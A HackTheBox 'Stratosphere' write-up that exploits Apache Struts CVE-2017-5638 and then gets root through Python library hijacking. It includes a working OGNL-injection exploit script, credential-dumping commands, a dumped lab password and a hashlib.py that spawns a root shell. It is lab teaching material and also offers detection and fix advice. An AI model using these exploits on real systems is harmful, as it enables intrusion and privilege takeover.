HackTheBox – Stratosphere Writeup

Hi All, the Stratosphere machine retired today on HackTheBox andddddddd YES! I will explain how I solved the Stratosphere box on HackTheBox. This was a medium difficulty box and one of the more interesting ones, with a nice privilege escalation technique.

Check out HackTheBox to upskill your pentest game: https://www.hackthebox.eu/

Let's begin with a basic nmap scan.


root@kali:~# nmap -sC -sV 10.10.10.64 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-31 21:57 IST
Nmap scan report for 10.10.10.64
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (EdDSA)
80/tcp open http

The scan reports three open ports (the output above is truncated), of which SSH on 22 and HTTP on 80 are the notable ones. The web application on port 80 is the natural place to start enumeration.

A dirbuster brute-force of the web root turns up an application hosted at http://10.10.10.64/Monitoring/

After a quick enumeration, the site turns out to be built on Apache Struts and vulnerable to CVE-2017-5638 (S2-045): the Jakarta Multipart parser copies a malformed Content-Type header into an error message that is then evaluated as an OGNL expression, which gives unauthenticated remote code execution through a single HTTP header.

A PoC can be found here: https://github.com/mazen160/struts-pwn

We get code execution by running the PoC as follows:

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'cat /etc/passwd'

<<snipped>>

richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash

<<snipped>>

From /etc/passwd we learn that a user named 'richard' exists on the machine with a login shell.
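To make the injection point concrete, here is an added example (my own code, not the struts-pwn tool from the link above) that builds the S2-045 Content-Type payload in the shape the public PoCs use, sends it to a target, and, on the defensive side, flags a Content-Type header that carries OGNL expression markers. The target URL is the one from this writeup; nothing is sent unless run_command() is called.

```python
import urllib.request

# Target from the writeup; assumed for illustration only.
TARGET = "http://10.10.10.64/Monitoring/example/Welcome.action"


def build_s2045_content_type(cmd: str) -> str:
    """Return the Content-Type header value that triggers CVE-2017-5638.

    The Jakarta Multipart parser echoes an unparseable Content-Type into an
    error message which Struts then evaluates as OGNL, so the whole exploit
    lives in this one header. The expression disables the OGNL sandbox
    (member access / excluded classes), runs `cmd` through ProcessBuilder and
    copies its output into the HTTP response.
    """
    # The command is embedded inside single quotes in the OGNL expression.
    cmd = cmd.replace("\\", "\\\\").replace("'", "\\'")
    return (
        "%{(#_='multipart/form-data')."
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        "(#_memberAccess?(#_memberAccess=#dm):"
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        "(#ognlUtil.getExcludedPackageNames().clear())."
        "(#ognlUtil.getExcludedClasses().clear())."
        "(#context.setMemberAccess(#dm))))."
        f"(#cmd='{cmd}')."
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        "(#p=new java.lang.ProcessBuilder(#cmds))."
        "(#p.redirectErrorStream(true))."
        "(#process=#p.start())."
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        "(#ros.flush())}"
    )


def run_command(url: str, cmd: str, timeout: int = 10) -> str:
    """Send the payload as a Content-Type header and return the command output."""
    req = urllib.request.Request(url, headers={"Content-Type": build_s2045_content_type(cmd)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def content_type_looks_malicious(content_type: str) -> bool:
    """Detection check: a legitimate Content-Type never contains an OGNL
    expression opener, so '%{' or '${' in this header is a reliable alert."""
    return "%{" in content_type or "${" in content_type


if __name__ == "__main__":
    print(run_command(TARGET, "cat /etc/passwd"))
```

The detection check is the same condition that WAF and IDS signatures for S2-045 key on; run over proxy or access logs that record request headers, it catches this class of exploit regardless of the command being executed.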

Similarly, a file named db_connect reveals that the application uses MySQL with the credentials 'admin'/'admin'. Since MySQL is not exposed externally, we rely on the RCE we already have to run SQL through the mysql client on the box:

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'mysql -u admin -padmin users -e "show tables;"'

Listing the tables of the users database shows one named 'accounts'.

Dumping the accounts table reveals credentials:

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'mysql -u admin -padmin users -e "select * from accounts;"'

fullName           password                    username
Richard F. Smith   9tc*rhKuG5TyXvUJOrE^5CK7k   richard

The password is stored in cleartext and is also richard's system password, so these credentials work for SSH on port 22 and give us the user flag.

richard@stratosphere:~$ ls
Desktop             hashlib.py        __pycache__ test.py          user.txt

 

Quick enumeration shows that richard can run a few commands as root:

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py

Also, a quick look at the source of test.py shows that it imports the hashlib library:

#!/usr/bin/python3
import hashlib

<<snipped>>

We can use the classic Python privilege-escalation technique of library hijacking, which abuses how Python resolves imports: the directory containing the script being run is inserted at the front of sys.path, ahead of the standard library, so any module name can be shadowed by a file placed next to the script.

Since we have write access to the directory containing the privileged script (/home/richard; note that it is the script's directory that matters, not the current working directory), we can create a file named 'hashlib.py' with our own code. Python then resolves `import hashlib` to our file instead of the real library, and because sudo runs test.py as root, our code runs as root. The sudoers wildcard `/usr/bin/python*` means any installed interpreter version works.

Create a file named 'hashlib.py' in the same directory as 'test.py' with the following content, which prints root.txt and spawns a root shell (more on this technique: https://rastating.github.io/privilege-escalation-via-python-library-hijacking/):

import os
import pty

# This file runs as root because sudo executes test.py as root and its
# "import hashlib" resolves to this file instead of the real module.
os.system('cat /root/root.txt')
pty.spawn("/bin/sh")

Now run the following command to gain ROOT!

richard@stratosphere:~$ sudo /usr/bin/python3 /home/richard/test.py

#
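To show the mechanism behind this escalation in a reproducible way, here is an added example of my own (not the box's test.py and not the rastating code) that recreates the setup with constructed stand-ins: a script importing hashlib and a rogue hashlib.py beside it. It runs the script from a different working directory, proving that the script's directory, not the cwd, is what gets searched first, and also runs it with python -I, which drops the script directory from sys.path. A static resolve_import() check shows which file an import would pick up without executing anything.

```python
import importlib.machinery
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for the privileged script; the box's test.py is not reproduced.
PRIVILEGED_SCRIPT = (
    "import hashlib\n"
    "print('hashlib loaded from:', hashlib.__file__)\n"
)
# Constructed rogue module: it only announces itself instead of running commands.
HIJACK_MODULE = "print('HIJACKED: the hashlib.py next to the script won the import')\n"


def run_script(script_path: str, isolated: bool = False, cwd: str = None) -> str:
    """Run a script with the current interpreter and return its stdout.

    With isolated=True the interpreter is started with -I, whose documented
    effect includes removing the script's directory from sys.path.
    """
    args = [sys.executable] + (["-I"] if isolated else []) + [script_path]
    result = subprocess.run(args, cwd=cwd, capture_output=True, text=True, check=True)
    return result.stdout


def resolve_import(name: str, script_dir: str) -> str:
    """Static check: which file would `import name` resolve to for a script
    living in script_dir? Mirrors the runtime order (script dir, then sys.path)."""
    spec = importlib.machinery.PathFinder.find_spec(name, [script_dir] + sys.path)
    return spec.origin if spec else None


def demo() -> dict:
    """Build the writable script directory, run the script from elsewhere,
    and return what each invocation printed plus the static resolutions."""
    with tempfile.TemporaryDirectory() as script_dir, tempfile.TemporaryDirectory() as other_cwd:
        script = os.path.join(script_dir, "test.py")
        with open(script, "w") as f:
            f.write(PRIVILEGED_SCRIPT)
        with open(os.path.join(script_dir, "hashlib.py"), "w") as f:
            f.write(HIJACK_MODULE)
        return {
            "script_dir": script_dir,
            # Run from another directory: the hijack still works.
            "default": run_script(script, cwd=other_cwd),
            # -I: the script directory is no longer on sys.path.
            "isolated": run_script(script, isolated=True, cwd=other_cwd),
            # Static view of the same two situations.
            "resolved_hijacked": resolve_import("hashlib", script_dir),
            "resolved_clean": resolve_import("hashlib", other_cwd),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that on the box the fix is not for richard to add -I: the sudoers rule matches the exact command line, so the flag would not be permitted. The defect is on the administrator's side, a root-executed script sitting in a user-writable directory; keep such scripts (and their directory) root-owned and not writable by the invoking user.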

Thank you, and stay tuned for the next write-up!